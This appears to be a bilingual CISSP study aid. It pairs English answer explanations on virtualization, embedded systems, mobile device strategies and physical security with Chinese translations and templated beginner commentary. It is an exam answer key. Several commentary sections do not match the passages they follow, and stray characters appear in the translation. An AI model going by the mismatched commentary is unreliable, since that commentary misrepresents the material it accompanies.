are not derivatives of SOA. Cyber-physical systems are devices that offer a computational means to control something in the physical world. Fog computing relies on sensors, IoT devices, or even edge computing devices to collect data and then transfer it back to a central location for processing. Distributed control systems (DCSs) are typically found in industrial process plants where the need to gather data and implement control over a large-scale environment from a single location is essential. 11. B. This scenario describes the systems as being nonpersistent. A nonpersistent system or static system is a computer system that does not allow, support, or retain changes.

Thus, between uses and/or reboots, the operating environment and installed software are exactly the same. Changes may be blocked or simply discarded after each system use. A nonpersistent system is able to maintain its configuration and security in spite of user attempts to implement change. This scenario is not describing a cloud solution, although a virtual desktop infrastructure (VDI) could be implemented on-premises or in the cloud. This scenario is not describing thin clients, since the existing “standard” PC endpoints are still in use but a VDI is being used instead of the local system capabilities. A VDI deployment simulates a thin client.

This scenario is not describing fog computing. Fog computing relies on sensors, IoT devices, or even edge computing devices to collect data and then transfer it back to a central location for processing. 12. B. The issue in this situation is VM sprawl. Sprawl occurs when organizations fail to plan their IT/IS needs and just deploy new systems, software, and VMs whenever their production needs demand it. This often results in obtaining underpowered equipment that is then overtaxed by inefficient implementations of software and VMs. This situation is not specifically related to end-of-service-life (EOSL) systems, but EOSL systems would exacerbate the sprawl issue.

This situation is not related to poor cryptography, nor is there any evidence of VM escaping issues. 13. C. Containerization is based on the concept of eliminating the duplication of OS elements in a virtual machine. Instead, each application is placed into a container that includes only the actual resources needed to support the enclosed application, and the common or shared OS elements are then part of the hypervisor. The system as a whole could be redeployed using a containerization solution, and each of the applications previously present in the original seven VMs could be

中文直译 / 整理

不是面向服务架构(SOA)的衍生品。 信息物理系统是提供计算手段以控 制物理世界中某物的设备。 雾计算依赖于传感器、物联网设备甚至边缘计 算设备来收集数据,然后将其传输回中心位置进行处理。 分布式控制系统 (DCS)通常存在于工业流程工厂中,因为在单一位置收集数据并实现对 大规模环境的控制至关重要。 11. B. 此场景将系统描述为非持久性系统。 非持久性系统或静态系统是指不允 许、不支持或不保留更改的计算机系统。 因此,在每次使用和/或重启之间, 操作系统环境和已安装的软件完全相同。 更改可能被阻止,或在每次系统使用 后直接丢弃。 尽管用户试图进行更改,非持久性系统仍能维持其配置和安全性。 此场景并未描述云解决方案,尽管虚拟桌面基础架构(VDI)既可在本地部署, 也可在云端部署。 此场景也未描述瘦客户端,因为现有的“标准”PC终端仍 在使用,但采用的是VDI而非本地系统功能。 VDI部署模拟了瘦客户端。 此场 景未描述雾计算。 雾计算依赖于传感器、物联网设备甚至边缘计算设备来收集 数据,然后将其传输回中央位置进行处理。 12. B. 此情况中的问题是虚拟机蔓延。

蔓延发生在组织未能规划其IT/信息系 统需求,而仅在生产需求出现时随意部署新系统、软件和虚拟机时。 这通常导 致获取性能不足的设备,而这些设备又被低效的软件和虚拟机实现过度占用。 此情况与服务终止(EOSL)系统无直接关联,但EOSL系统会加剧蔓延问题。 此情况与加密技术不佳无关,也无任何证据表明存在虚拟机逃逸问题。 13. C. 容器化基于消除虚拟机中操作系统元素重复的概念。 相反,每个应用 程序都被放置到一个仅包含支持该应用程序所需实际资源的容器中,而公共 或共享的操作系统元素则成为虚拟机监控程序的一部分。 整个系统可以使用 容器化解决方案重新部署,原先存在于七个虚拟机中的每个应用程序都可以

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 104 / PDF P1498

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

placed into containers, as well as the six new applications. This should result in all 13 applications being able to operate reasonably well without the need for new hardware. Data sovereignty is the concept that, once information has been converted into a binary form and stored as digital files, it is subject to the laws of the country within which the storage device resides. Infrastructure as code (IaC) is a change in how hardware management is perceived and handled.

Instead of seeing hardware configuration as a manual, direct hands-on, one-on-one administration hassle, it is viewed as just another collection of elements to be managed in the same way that software and code are managed under DevSecOps (security, development, and operations). Process isolation requires that the OS provide separate memory spaces for each process's instructions and data and that the OS enforce those boundaries, preventing one process from reading or writing data that belongs to another process. 14. B. In industrial control systems (ICSs), ensuring the availability of realtime control signals is a primary concern.

Confidentiality, integrity, and nonrepudiation are important security concerns, but the immediate and continuous availability of control signals is critical for the proper functioning of industrial processes. 15. C. Because an embedded system is often in control of a mechanism in the physical world, a security breach could cause harm to people and property (aka cyber-physical). This typically is not true of a standard PC. Power loss, internet access, and software flaws are security risks of both embedded systems and standard PCs. 16. A. Arduino is a microcontroller that can be used to perform automated tasks.

MPP (massive parallel processing) systems are too expensive and not a reasonable option for this scenario. A real-time operating system (RTOS) is designed to process or handle data as it arrives on the system with minimal latency or delay. RTOS is a software OS that is usually stored and executed from ROM and thus may be part of an embedded solution or hosted on a microcontroller. An RTOS is designed for mission-critical operations where delay must be eliminated or minimized for safety. Thus, RTOS is not the best option for this scenario since it is about managing a garden, which does not need real-time mission-critical operations.

A field-programmable gate array (FPGA) is a flexible computing device intended to be programmed by the end user or customer. FPGAs are often used as embedded devices in a wide range of products, including industrial control systems (ICSs). FPGAs can be

中文直译 / 整理

放入容器中,以及六个新应用程序。 这应使全部13个应用程序都能在无需 新硬件的情况下合理运行。 数据主权是指,一旦信息被转换为二进制形式 并以数字文件存储,它即受存储设备所在国家法律的管辖。 基础设施即代 码(IaC)改变了对硬件管理的认知和处理方式。 与其将硬件配置视为需 要手动、直接、一对一管理的繁琐任务,不如将其视为与DevSecOps(安 全、开发和运维)下软件和代码管理方式相同的另一组元素进行管理。 进 程隔离要求操作系统为每个进程的指令和数据提供独立的内存空间,并强 制执行这些边界,防止一个进程读取或写入属于另一个进程的数据。 14. B. 在工业控制系统(ICSs)中,确保实时控制信号的可用性是首要关注 点。 机密性、完整性和不可否认性性是重要的安全问题,但控制信号的即时和 持续可用性对于工业过程的正常运行至关重要。 15. C. 由于嵌入式系统通常控制着物理世界中的某种机制,安全漏洞可能对 人员和财产造成损害(即网络‑物理攻击)。 这通常不适用于标准PC。 电源 中断、互联网访问和软件缺陷是嵌入式系统和标准PC共同面临的安全风险。 16. A. Arduino 是一种可用于执行自动化任务的微控制器。

MPP(大规模并 行处理)系统成本过高,不适合此场景。 实时操作系统(RTOS)旨在以最小 的延迟或延迟处理或响应系统到达的数据。 RTOS 是一种软件操作系统,通常 存储并从 ROM 中执行,因此可能是嵌入式解决方案的一部分,或托管在微控 制器上。 RTOS 专为必须消除或最小化延迟以确保安全的关键任务操作而设计。 因此,由于此场景是关于管理花园,不需要实时关键任务操作,RTOS 并非最 佳选择。 现场可编程门阵列(FPGA)是一种可由最终用户或客户编程的灵活 计算设备。 FPGA 常用于各种产品中的嵌入式设备,包括工业控制系统( ICSs)。 FPGA 可以

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

ISO 偏标准和管理体系。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
学习单元 105 / PDF P1499

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

challenging to program and are often more expensive than other more limited solutions. Thus, FPGA is not the best fit for this scenario. 17. D. This scenario is describing a product that requires a real-time operating system (RTOS) solution, since it mentions the need to minimize latency and delay, storing code in ROM, and optimizing for mission-critical operations. A containerized application is not a good fit for this situation because it may not be able to operate in near real time due to the virtualization infrastructure, and containerized apps are typically stored as files on the contain host rather than a ROM chip.

An Arduino is a type of microcontroller, but not typically robust enough to be considered a near-real-time mechanism; it stores code on a flash chip, has a limited C++ based instruction set, and is not suited for missioncritical operations. A distributed control system (DCS) can be used to manage small-scale industrial processes, but it is not designed as a nearreal-time solution. DCSs are not stored in ROM, but they may be used to manage mission-critical operations. 18. A. This scenario is an example of edge computing. In edge computing, the intelligence and processing is contained within each device.

Thus, rather than having to send data off to a master processing entity, each device can process its own data locally. The architecture of edge computing performs computations closer to the data source, which is at or near the edge of the network. Fog computing relies on sensors, IoT devices, or even edge computing devices to collect data and then transfer it back to a central location for processing. A thin client is a computer with low to modest capability or a virtual interface that is used to remotely access and control a mainframe, virtual machine, or virtual desktop infrastructure (VDI). Infrastructure as code (IaC) is a change in how hardware management is perceived and handled.

Instead of seeing hardware configuration as a manual, direct hands-on, one-on-one administration hassle, it is viewed as just another collection of elements to be managed in the same way that software and code are managed under DevOps. 19. B. The risk of a lost or stolen laptop is the data loss, not the loss of the system itself, but the value of the data on the system, whether business related or personal. Thus, keeping minimal sensitive data on the system is the only way to reduce the risk. Hard drive encryption, cable locks, and strong passwords, although good ideas, are preventive tools, not means of reducing risk. They don't keep intentional and malicious data

中文直译 / 整理

编程难度大,且通常比其他更有限的解决方案更昂贵。 因此,FPGA并不适合此 场景。 17. D. 此场景描述了一种需要实时操作系统(RTOS)解决方案的产品,因为 它提到了需要最小化延迟和延迟、将代码存储在 ROM 中,并针对关键任务 操作进行优化。 容器化应用程序不适合这种情况,因为由于虚拟化基础设施, 它可能无法实现近实时运行; 容器化应用程序通常作为文件存储在宿主机上, 而非 ROM 芯片中。 Arduino 是一种微控制器,但通常不够稳健,无法被视 为近实时机制; 它将代码存储在闪存芯片上,具有有限的 C++ 指令集,不适 合关键任务操作。 分布式控制系统(DCS)可用于管理小型工业过程,但其 设计并非作为近实时解决方案。 DCS 不存储在 ROM 中,但可用于管理关键 任务操作。 18. A. 此场景是边缘计算的一个示例。 在边缘计算中,智能和处理功能包含在 每个设备内部。 因此,无需将数据发送到主处理实体,每个设备都可以在本地 处理自己的数据。 边缘计算的架构在更接近数据源的位置执行计算,即在网络 边缘或附近。 雾计算依赖于传感器、物联网设备甚至边缘计算设备来收集数据, 然后将其传输回中央位置进行处理。

瘦客户端是一种功能较低或中等的计算机, 或用于远程访问和控制大型机、虚拟机或虚拟桌面基础设施(VDI)的虚拟界 面。 基础设施即代码(IaC)改变了人们对硬件管理的认知和处理方式。 它不 再将硬件配置视为手动、直接、一对一的管理繁琐任务,而是将其视为与其他 软件和代码一样,通过 DevOps 进行管理的另一组元素。 19. B. 笔记本电脑丢失或被盗的风险在于数据丢失,而非系统本身的损失,而 是系统上数据的价值,无论是与业务相关还是个人数据。 因此,仅在系统上保 留最少的敏感数据才是降低风险的唯一方法。 硬盘加密、防盗锁和强密码虽然 是好主意,但只是预防性工具,并非降低风险的手段。 它们无法阻止故意且恶 意的数据

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

RTO 问时间:多久必须恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恢复时间目标 RTO RTO 是业务或系统最多能中断多久。
学习单元 106 / PDF P1500

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

compromise from occurring; instead, they encourage honest people to stay honest. Hard drive encryption can be bypassed using the cold boot attack or by taking advantage of an encryption service flaw or configuration mistake. Cable locks can be cut or ripped out of the chassis. Strong passwords do not prevent the theft of a device, and password cracking and/or credential stuffing may be able to overcome the protection. If not, the drive could be extracted and connected to another system to access files directly, even with the native OS running. 20. D. The best option in this scenario is corporate-owned.

A corporateowned mobile strategy (COMS) or corporate-owned, business-only (COBO) is when the company purchases mobile devices that can support compliance with the security policy. These devices are to be used exclusively for company purposes, and users should not perform any personal tasks on them. This option often requires workers to carry a second device for personal use. Corporate-owned clearly assigns responsibility for device oversight to the organization. The other three options still allow for comingling of data and have unclear or vague security responsibility assignments as a concept or policy basis.

BYOD is a policy that allows employees to bring their own personal mobile devices to work and use those devices to connect to business resources and/or the Internet through the company network. The concept of corporate-owned, personally enabled (COPE) means the organization purchases devices and provides them to employees. Each user is then able to customize the device and use it for both work activities and personal activities. The concept of choose your own device (CYOD) provides users with a list of approved devices from which to select the device to implement.

中文直译 / 整理

防止妥协发生; 相反,它们鼓励诚实的人保持诚实。 硬盘加密可以通过 冷启动攻击或利用加密服务的漏洞或配置错误来绕过 g误。 电缆锁可被剪断或 pp从机箱中取出。 强密码无法防止设备被盗,密码破解和/或凭证填充可能能够克服这种保 护。 否则,硬盘可能被取出并连接到另一 系统,即使在原生操作系统运行的情况下也能直接访问文件。 20. D. 在此情景下最佳选择是企业所有。 企业所有移动策略(COMS)或企业 所有、仅限业务(COBO)是指公司购买可支持安全策略合规性的移动设备。 这些设备应仅用于公司用途,用户不应在其上执行任何个人任务。 此选项通常 要求员工携带第二台设备用于个人用途。 企业所有明确将设备监管责任分配给 组织。 其他三个选项仍允许数据混用,且作为概念或政策基础,安全责任分配 不明确或模糊。 BYOD 是一种允许员工将个人移动设备带入工作场所,并通 过公司网络连接到业务资源和/或互联网的政策。 企业所有、个人启用( COPE)的概念是指组织购买设备并提供给员工,每位用户随后可自定义设备 并将其用于工作和个人活动。 选择你自己的设备(CYOD)的概念为用户提供 了一份获批设备列表,从中选择 要实现的设备。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

政策:政策是高层原则,说明必须遵守什么。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Policy 高层、强制、稳定;Procedure 具体步骤。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 107 / PDF P1501

第 1501 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Chapter 10: Physical Security Requirements 1. C. Natural training and enrichment is not a core strategy of first generation CPTED. Crime Prevention Through Environmental Design (CPTED) has four main strategies: access control, natural surveillance, image and milieu, and territorial control. Access control is the subtle guidance of those entering and leaving a building through the placement of entranceways, fences, bollards, and lights. Natural surveillance is any means to make criminals feel uneasy through the increasing opportunities for them to be observed. Territorial control is the attempt to make the area feel like an inclusive, caring community. 2. B.

Critical path analysis is a systematic effort to identify relationships between mission-critical applications, processes, and operations and all the necessary supporting elements when evaluating the security of a facility or designing a new facility. Log file audit can help detect violations to hold users accountable, but it is not a security facility design element. Risk analysis is often involved in facility design, but it is the evaluation of threats against assets regarding the rate of occurrence and levels of consequence. Taking inventory is an important part of facility and equipment management but is not an element in overall facility design. 3. A, C, F.

The true statements are option A, cameras should be positioned to watch exit and entry points; option C, cameras should be positioned to have clear sight lines of all exterior walls, entrance and exit points, and interior hallways; and option F, some camera systems include a system on a chip (SoC) or embedded components and may be able to perform various specialty functions, such as time-lapse recording, tracking, facial recognition, object detection, or infrared or color-filtered recording. The remaining answer options are incorrect.

The corrected statements for those options are: option B: cameras should be used to monitor activities around valuable assets and resources as well as to provide additional protection in public areas such as parking structures and walkways; option D: security cameras can be overt and obvious to provide a deterrent benefit, or hidden and concealed to primarily provide a detection benefit; option E: some cameras are fixed, whereas others support remote control of automated pan, tilt, and zoom (PTZ); and option G: simple motion recognition or motion-triggered cameras may be fooled by animals, birds, insects, weather, or foliage.

中文直译 / 整理

第10章:物理安全要求 1. C. 自然训练和丰富化不是第一代CPTED的核心策略。 通过环境设计预防 犯罪(CPTED)有四大策略:出入口控制、自然监视、形象与环境,以及 领域控制。 出入口控制是通过出入口、围栏、柱桩和灯光的布置,微妙地引 导进出建筑物的人员。 自然监视是指通过增加犯罪者被观察的机会,使其感 到不安的任何手段。 领域控制是试图使该区域感觉像一个包容且关怀的社区。 2. B. 关键路径分析是在评估设施安全性或设计新设施时,系统性地识别关键 任务应用程序、流程和操作与所有必要支持要素之间关系的努力。 日志文件 审计有助于检测违规行为以追究用户责任,但它不是安全设施设计的要素。 风险分析通常涉及设施设计,但它是针对资产的威胁发生率和后果级别的评 估。 清点库存是设施和设备管理的重要部分,但不是整体设施设计的要素。 3. A、C、F。 正确的陈述为选项A:摄像头应布置在监控出入口的位置; 选 项C:摄像头应确保对所有外墙、出入口和内部走廊有清晰的视野; 选项F: 部分摄像头系统包含片上系统(SoC)或嵌入式组件,能够执行多种特殊功 能,例如延时录制、追踪、人脸识别、物体检测或红外或彩色滤光录制。

其 余选项均不正确。 这些选项的修正陈述如下:选项B:摄像头应用于监控贵重 资产和资源周围的活动,并为停车场、人行道等公共区域提供额外保护; 选 项D:安防摄像头可以是显眼的,以起到威慑作用,也可以是隐蔽的,以主要 实现检测功能; 选项E:部分摄像头为固定式,而其他摄像头支持远程控制自 动云台、俯仰和变焦(PTZ); 选项G:简单的运动识别或运动触发摄像头可 能被动物、鸟类、昆虫、天气或植被误导。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1501 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

网络题先定位层次,再判断协议、设备或攻击位置。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 108 / PDF P1502

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

4. D. Equal access to all locations within a facility is not a security-focused design element. Each area containing assets or resources of different importance, value, and confidentiality should have a corresponding level of security restriction placed on it. A secure facility should have a separation between work and visitor areas and should restrict access to areas with higher value or importance, and confidential assets should be located in the heart or center of a facility. 5. A. A computer room does not need to be optimized for human workers to be efficient and secure.

A server room would be more secure with a nonwater fire suppressant system (it would protect against damage caused by water suppressant). A server room should have humidity maintained between 20 and 80 percent relative humidity and temperature maintained between 59 and 89.6 degrees Fahrenheit. 6. C. Hashing is not a typical security measure implemented in relation to a media storage facility containing reusable, removable media. Hashing is used when it is necessary to verify the integrity of a dataset, whereas data on reusable removable media should be removed and not retained.

Usually, the security features for a media storage facility include using a media librarian or custodian, using a check-in/checkout process, and using sanitization tools on returned media. 7. B. The humidity in a computer room should ideally be from 20 to 80 percent. Humidity above 80 percent can result in condensation, which causes corrosion. Humidity below 20 percent can result in increased static electricity buildup. However, this does require managing temperature properly as well. The other number ranges are not the relative humidity ranges recommended for a data center. 8. B, C, E, F, H.

The primary elements of a cable plant management policy should include a mapping of the entrance facility (i.e., demarcation point), equipment room, backbone distribution system, telecommunications room, and horizontal distribution system. The other items are not elements of a cable plant. Thus, person traps, fire escapes, UPSs, and the loading dock are not needed elements on a cable map. 9. C. A preaction system is the best type of water-based fire suppression system for a computer facility because it provides the opportunity to prevent the release of water in the event of a false alarm or false initial trigger. The other options of wet pipe, dry pipe, and deluge system use 4. D.

中文直译 / 整理

在设施内所有位置的平等访问并非以安全为重点的设计要素。 每个包 含不同重要性、价值和保密级别资产或资源的区域,都应设置相应级别的安 全限制。 一个安全的设施应在工作区和访客区之间进行隔离,并限制对高价 值或重要区域的访问,敏感资产应位于设施的核心或中心位置。 5. A. 计算机房无需为提高人类工作者的效率和安全性而进行优化。 服务器房 应配备非水性灭火系统(可防止水灭火造成的损害)。 服务器房的湿度应维 持在20%至80%相对湿度之间,温度应维持在59至89.6华氏度之间。 6. C. 哈希并非在包含可重复使用可移动介质的媒体存储设施中通常实施的安 全措施。 哈希用于验证数据集的完整性,而可重复使用可移动介质上的数据 应被清除而非保留。 通常,媒体存储设施的安全措施包括使用媒体管理员或 保管人、采用借出/归还流程,以及对归还的媒体使用净化工具。 7. B. 计算机房的湿度理想范围应为20%至80%。 湿度高于80%可能导致 冷凝,从而引起腐蚀; 湿度低于20%则可能导致静电积聚增加。 然而,这 也需要妥善管理温度。 其他数值范围并非数据中心推荐的相对湿度范围。

8. B, C, E, F, H. 电缆布线管理政策的主要要素应包括入口设施(即分界点)、 设备间、主干分布系统、电信间和水平分布系统的布线图。 其他项目并非电 缆布线的组成部分,因此人员陷阱、消防通道、UPS和装卸区并非电缆图中 必需的要素。 9. C. 预作用系统是计算机设施最合适的水基灭火系统,因为它能够在误报 警或误触发时防止水的释放。 其他选项如湿式管道、干式管道和雨淋系统 使用

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

政策:政策是高层原则,说明必须遵守什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

Policy 高层、强制、稳定;Procedure 具体步骤。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 109 / PDF P1503

第 1503 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

only a single trigger mechanism without the ability to prevent accidental water release. 10. B. Human error is the most common cause of a false positive for a waterbased system. If you turn off the water source after a fire and forget to turn it back on, you'll be in trouble in the future. Also, pulling an alarm when there is no fire will trigger damaging water release throughout the office. Water shortage would be a problem, but it is not a cause for a false positive event. Ionization detectors are highly reliable, so they are usually not the cause of a false positive event.

